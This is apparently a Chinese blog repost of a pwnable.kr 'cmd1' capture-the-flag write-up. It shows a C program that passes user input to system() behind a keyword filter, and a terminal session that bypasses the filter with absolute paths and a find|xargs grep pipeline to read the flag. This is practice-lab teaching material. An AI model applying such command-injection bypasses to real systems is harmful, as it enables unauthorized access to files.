标签:
cmd1@ubuntu:~$ ls
cmd1 cmd1.c flag
cmd1@ubuntu:~$ cat cmd1.c
#include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "flag")!=0;
r += strstr(cmd, "sh")!=0;
r += strstr(cmd, "tmp")!=0;
return r;
}
int main(int argc, char* argv[], char** envp){
putenv("PATH=/fuckyouverymuch");
if(filter(argv[1])) return 0;
system( argv[1] );
return 0;
}
cmd1@ubuntu:~$ ./cmd1 "ls"
sh: 1: ls: not found
cmd1@ubuntu:~$ ./cmd1 "/bin/ls"
cmd1 cmd1.c flag
cmd1@ubuntu:~$ ./cmd1 "/usr/bin/find"
.
./cmd1
./.bash_history
/usr/bin/find: `./.bash_history‘: Permission denied
./flag
./cmd1.c
cmd1@ubuntu:~$ ./cmd1 "/usr/bin/find | /usr/bin/xargs /bin/grep "m""
/usr/bin/find: `./.bash_history‘: Permission denied
Binary file ./cmd1 matches
/bin/grep: ./.bash_history: Permission denied
./flag:mommy now I get what PATH environment is for :)
./cmd1.c:int filter(char* cmd){
./cmd1.c: r += strstr(cmd, "flag")!=0;
./cmd1.c: r += strstr(cmd, "sh")!=0;
./cmd1.c: r += strstr(cmd, "tmp")!=0;
./cmd1.c:int main(int argc, char* argv[], char** envp){
./cmd1.c: putenv("PATH=/fuckyouverymuch");
./cmd1.c: system( argv[1] );
cmd1@ubuntu:~$ logout
Connection to pwnable.kr closed.
【LINUX】pwnable.kr cmd1 writeup
标签:
原文地址:http://www.cnblogs.com/windcarp/p/4657886.html
